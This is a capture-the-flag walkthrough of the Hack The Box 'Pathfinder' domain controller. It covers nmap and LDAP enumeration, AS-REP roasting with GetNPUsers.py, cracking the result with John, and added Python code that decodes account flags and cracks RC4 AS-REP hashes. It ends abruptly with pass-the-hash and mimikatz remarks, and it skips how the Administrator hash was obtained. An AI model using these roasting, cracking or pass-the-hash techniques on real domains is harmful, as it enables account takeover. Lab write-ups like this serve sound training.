After the Shield walkthrough, here I am with the Pathfinder box, the last box you can play as a free member on the HTB platform. Let's hack it and grab the flags.
As I mentioned before, the Starting Point machines are a series of 9 easy-rated machines that should be rooted in sequence. That means if you want to go through this box, you must first have completed the Shield machine.
Enough talk, 🥱 Let's Get It Started 🐱💻
Disclaimer: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure and grab the flags yourself! 🐱👤
00. Start Machine …
To start the machine, just click "Join Machine".
Then you can see the IP address for that machine. Usually it is 10.10.10.30 🤠
Before moving on to the enumeration steps, we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall drops ICMP echo requests, but in most cases the ping will succeed! 🙂
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP port range (65535)
-T4 : Aggressive (4) speed scan; assumes you are on a reasonably fast and reliable network
Here is the output 👇
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining)
Discovered open port 49714/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Completed SYN Stealth Scan at 11:26, 173.96s elapsed (65535 total ports)
Nmap scan report for 10.10.10.30
Host is up, received echo-reply ttl 127 (0.24s latency).
Scanned at 2021-05-21 11:23:43 EDT for 175s
Not shown: 65466 closed ports, 45 filtered ports
Reason: 65466 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49683/tcp open  unknown          syn-ack ttl 127
49695/tcp open  unknown          syn-ack ttl 127
49714/tcp open  unknown          syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 174.50 seconds
Raw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB)
This is why I recommend scanning all the ports. There are a lot of open ports here, and the combination (ldap on 389/636, the global catalog on 3268/3269, kpasswd5 on 464 and kerberos on 88) tells us this is not just an Active Directory machine but the domain controller itself. We haven't touched that area before, so sharpen your Active Directory enumeration skills; it will be worth it if you want to try Red Team activities.
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. [Copied from Wikipedia]
01.2 Run Nmap Scripting Engine
To get the best result, we run the Nmap Scripting Engine (-sC) together with version detection (-sV) against the open ports only. Now that we know all the open ports, we can point the scan at them and have it finish much faster. One caveat: the 49xxx ports are dynamic RPC endpoint ports and differ from scan to scan, so don't hard-code them; three of the ones in the command below came back closed, and the first scan's 49673, 49695 and 49714 are missing from that list entirely.
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:43 EDT
Nmap scan report for 10.10.10.30
Host is up (0.23s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49676/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc         Microsoft Windows RPC
49683/tcp open   msrpc         Microsoft Windows RPC
49700/tcp closed unknown
49720/tcp closed unknown
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h11m13s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-21T22:55:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds
As this is an Active Directory machine (the domain controller, in fact), our enumeration steps will be different. LDAP enumeration is pretty cool with BloodHound because it gives you graphical information, but that's already done in the official writeup, so let's go my way. 😎😎 One detail from the host scripts is worth writing down now: the clock skew of about 7 hours. Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock, so if you later use Kerberos tickets against this box (rather than a password over WinRM, as we do below), sync your clock to the DC first. Requesting an AS-REP for a user without pre-authentication is not affected, because no timestamp is sent.
01.3 Discover more on domain
Nmap tells us the domain we are in (MEGACORP.LOCAL). And don't forget we have credentials from the Shield machine: sandra:Password1234!. First let's try the ldapdomaindump tool with those credentials.
-u : DOMAIN\username for authentication, leave empty for anonymous authentication
-p : Password or LM:NTLM hash, will prompt if not specified
-o : Directory in which the dump will be saved (default: current)
--no-json : Disable JSON output
--no-grep : Disable Greppable output
As you can see, ldapdomaindump produced a lot of HTML files. Among them, I first choose domain_users.html. You can open it in the browser, but instead of that I will use the html2text tool. You can simply install it with sudo apt-get install html2text. The result will look like this. 👇👇
There are 5 accounts here. Guest, Administrator and krbtgt are the default accounts; sandra and svc_bes are user-created. I highlighted the svc_bes account because it has the DONT_REQ_PREAUTH flag set. That flag is a bit in the account's userAccountControl attribute, which is what the Flags column of the dump decodes.
Now I'll briefly explain Kerberos authentication, because to understand what the DONT_REQ_PREAUTH flag means you first need to understand how the normal flow works.
This diagram shows the normal authentication process. Normally the client has to prove it knows the password before the KDC answers (pre-authentication: a timestamp encrypted with the user's key, sent in the AS-REQ). If DONT_REQ_PREAUTH is set, the second and third steps of the process can be skipped: anyone can send an AS-REQ for that user and the KDC replies with an AS-REP straight away. Part of that reply is encrypted with a key derived from the user's password, so it can be taken offline and brute-forced. This is known as AS-REP roasting. Click here if you need more information about Kerberos authentication.
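To make the flag check concrete, here is an added example (my own code, not part of the original walkthrough and not ldapdomaindump's code) that decodes the userAccountControl attribute the dump's Flags column is built from and picks out the accounts worth AS-REP roasting: DONT_REQ_PREAUTH set and the account not disabled. The sample dump is constructed to resemble a simplified domain_users.json; the flag values for the five real accounts are assumptions that match the flags described above, and the disabled svc_old entry is invented purely to show the filter at work.

```python
import json

# userAccountControl bit flags, as documented by Microsoft for the AD attribute.
UAC_FLAGS = {
    0x00000001: "SCRIPT",
    0x00000002: "ACCOUNTDISABLE",
    0x00000008: "HOMEDIR_REQUIRED",
    0x00000010: "LOCKOUT",
    0x00000020: "PASSWD_NOTREQD",
    0x00000040: "PASSWD_CANT_CHANGE",
    0x00000080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x00000100: "TEMP_DUPLICATE_ACCOUNT",
    0x00000200: "NORMAL_ACCOUNT",
    0x00000800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00020000: "MNS_LOGON_ACCOUNT",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00100000: "NOT_DELEGATED",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQ_PREAUTH",
    0x00800000: "PASSWORD_EXPIRED",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x04000000: "PARTIAL_SECRETS_ACCOUNT",
}
ACCOUNTDISABLE = 0x00000002
DONT_REQ_PREAUTH = 0x00400000


def decode_uac(value: int) -> list:
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def load_users(json_text: str) -> list:
    """Parse a domain_users.json-style dump: a list of entries, each with an 'attributes' dict."""
    return json.loads(json_text)


def account_flags(entries: list) -> dict:
    """sAMAccountName -> decoded flag names, for every entry in the dump."""
    return {
        e["attributes"]["sAMAccountName"][0]: decode_uac(e["attributes"]["userAccountControl"][0])
        for e in entries
    }


def asrep_roastable(entries: list) -> list:
    """Accounts that can be AS-REP roasted: DONT_REQ_PREAUTH set and the account not disabled."""
    hits = []
    for e in entries:
        uac = e["attributes"]["userAccountControl"][0]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(e["attributes"]["sAMAccountName"][0])
    return hits


def _entry(name: str, uac: int) -> dict:
    # Constructed entry in a simplified ldapdomaindump-like shape (multi-valued attributes as lists).
    return {"dn": f"CN={name},CN=Users,DC=MEGACORP,DC=LOCAL",
            "attributes": {"sAMAccountName": [name], "userAccountControl": [uac]}}


# Constructed sample dump. The UAC values for the five accounts are assumptions that match the
# flags described in the walkthrough; svc_old is invented to show that disabled accounts are skipped.
SAMPLE_DUMP = json.dumps([
    _entry("Administrator", 0x00000200 | 0x00010000),                   # NORMAL, DONT_EXPIRE
    _entry("Guest", 0x00000200 | 0x00000002 | 0x00000020 | 0x00010000),  # default Guest: disabled
    _entry("krbtgt", 0x00000200 | 0x00000002),                          # default krbtgt: disabled
    _entry("sandra", 0x00000200 | 0x00010000),
    _entry("svc_bes", 0x00000200 | 0x00010000 | 0x00400000),            # DONT_REQ_PREAUTH set
    _entry("svc_old", 0x00000200 | 0x00000002 | 0x00400000),            # no pre-auth, but disabled
])

if __name__ == "__main__":
    users = load_users(SAMPLE_DUMP)
    for name, flags in account_flags(users).items():
        print(f"{name:14} {', '.join(flags)}")
    print("AS-REP roastable:", asrep_roastable(users))
```

Disabled accounts are skipped on purpose: the KDC will not issue an AS-REP for them, so GetNPUsers.py would only report an error. When you run this against a real dump, the only thing to adapt is the attribute layout of whatever JSON your version of ldapdomaindump writes.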
02. Foothold
Now we are going to use Impacket's GetNPUsers.py script to request that AS-REP for svc_bes.
If you don't have Impacket installed on your machine, install it first; on Kali the example scripts live under /usr/share/doc/python3-impacket/examples/. Then run the script against the domain controller:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
-request : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass : Don't ask for password (useful for Kerberos authentication)
-dc-ip : IP Address of the domain controller.
-format : Format to save the AS_REQ of users without pre-authentication. Default is hashcat
The output will look like this. 👇👇
We grabbed the hash. Now it's time to power up John the Ripper and crack it. First copy the hash into a file (here called hash), then run john. 🤠🤠
john hash --wordlist=/usr/share/wordlists/rockyou.txt
We got the password for svc_bes !!!
svc_bes : Sheffield19
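What does john actually do with that $krb5asrep$ line? Here is an added example (my own code, not from the walkthrough, Impacket or John the Ripper) that reproduces the check for etype 23 (RC4-HMAC): derive the NT hash (MD4 of the UTF-16LE password), key it for the AS-REP key usage 8, RC4-decrypt the edata and compare the HMAC-MD5 with the checksum carried in the hash line. Because there is no real capture here, the block first forges its own AS-REP blob (a constructed, non-DER enc-part and a fixed all-zero confounder, encrypted under Sheffield19), writes it in the same john layout GetNPUsers.py -format john prints, and then cracks it with a constructed five-word list. MD4 is implemented inline because hashlib.new('md4') is missing on many OpenSSL 3 builds.

```python
import hashlib
import hmac
import os
import struct


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), inline because hashlib.new('md4') is absent on many OpenSSL 3 builds."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; this is also the RC4-HMAC (etype 23) Kerberos key."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_AS_REP = 8  # RC4-HMAC key usage number for the AS-REP enc-part (RFC 4757)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RC4-HMAC encrypt as the KDC does: checksum || RC4(K3, confounder || plaintext)."""
    confounder = os.urandom(8) if confounder is None else confounder
    k1 = hmac_md5(key, struct.pack("<I", KEY_USAGE_AS_REP))
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def to_john_format(user: str, realm: str, blob: bytes) -> str:
    """Same layout GetNPUsers.py -format john prints: $krb5asrep$user@REALM:checksum$edata2."""
    return "$krb5asrep$%s@%s:%s$%s" % (user, realm, blob[:16].hex(), blob[16:].hex())


def parse_asrep_hash(line: str):
    body = line[len("$krb5asrep$"):]
    if body.startswith("23$"):  # the hashcat layout carries the etype first
        body = body[3:]
    principal, rest = body.split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_candidate(line: str, password: str) -> bool:
    """The cracker's test: re-derive K1/K3 from the candidate, decrypt, and verify the HMAC."""
    _, checksum, edata = parse_asrep_hash(line)
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_AS_REP))
    k3 = hmac_md5(k1, checksum)
    plaintext = rc4(k3, edata)  # confounder || EncASRepPart, if the key was right
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def crack(line: str, wordlist):
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


# Constructed sample: a fake enc-part (a real one is DER, APPLICATION 25, first byte 0x79) and a
# fixed all-zero confounder, encrypted under the password the walkthrough ends up recovering.
SAMPLE_PLAINTEXT = b"\x79\x81\x20" + b"constructed EncASRepPart, not real DER"
SAMPLE_HASH = to_john_format("svc_bes", "MEGACORP.LOCAL",
                             rc4_hmac_encrypt(nt_hash("Sheffield19"), SAMPLE_PLAINTEXT, bytes(8)))
WORDLIST = ["password", "Password1234!", "letmein", "Sheffield19", "Sheffield20"]  # constructed

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

The hashcat layout differs only by the extra 23$ etype field after the prefix, which parse_asrep_hash tolerates. Real crackers usually add a fast pre-check on the first decrypted bytes (a genuine EncASRepPart starts with the DER tag 0x79) before paying for the HMAC; it is the HMAC match that makes the result authoritative. Note that no guessing against the DC happens at all: everything after the single AS-REQ is offline, which is why a user with DONT_REQ_PREAUTH and a weak password is such an easy foothold.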
Now that we have a username and password, we can use the Evil-WinRM tool against the WinRM service we saw on port 5985. You can simply install it by typing gem install evil-winrm and hitting enter. 😎😎
Now, don't you have a question? ❓ We already had the username and password for sandra (we used them for the LDAP dump). Why didn't we log in with them? Because there is nothing of interest in that account; it's just a plain user account.
As you can see, we have the NTLM hash of the Administrator account. We can use it in a pass-the-hash attack to gain elevated access without ever knowing the password: Evil-WinRM accepts an NT hash in place of a password, and Impacket's psexec.py works the same way.
Since these boxes are all connected, we are going to grab the local admin hash too, so let's upload mimikatz. You can download mimikatz from here and serve it to the box with Python's built-in HTTP server.